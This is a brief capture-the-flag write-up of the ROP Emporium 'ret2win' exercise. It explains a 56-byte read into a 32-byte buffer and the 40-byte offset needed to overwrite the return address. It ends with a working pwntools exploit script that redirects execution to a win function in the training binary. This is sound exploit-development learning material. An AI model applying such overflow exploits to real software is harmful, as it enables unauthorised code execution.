ROP Emporium
ret2win
Theres a ret2win function that I need to run.
Main function points to a pwnme function.
Ok, there is a buffer overflow here, since it reads in 56 bytes into a 32 byte buffer.
So, I have to put in 32 bytes of anything with the address of ret2win.
But it does not work, because need to overwrite the RBP also, thats another 8 bytes buffer added.
I got the flag (I am not sure why the program is not cat-ing out the flag prob something with the permissions).
Solution:
from pwn import *
p = process('./ret2win')
p.recv()
buffer = b"A"*40
ret2win = p64(0x0000000000400756)
p.sendline(buffer + ret2win)
print(p.recv())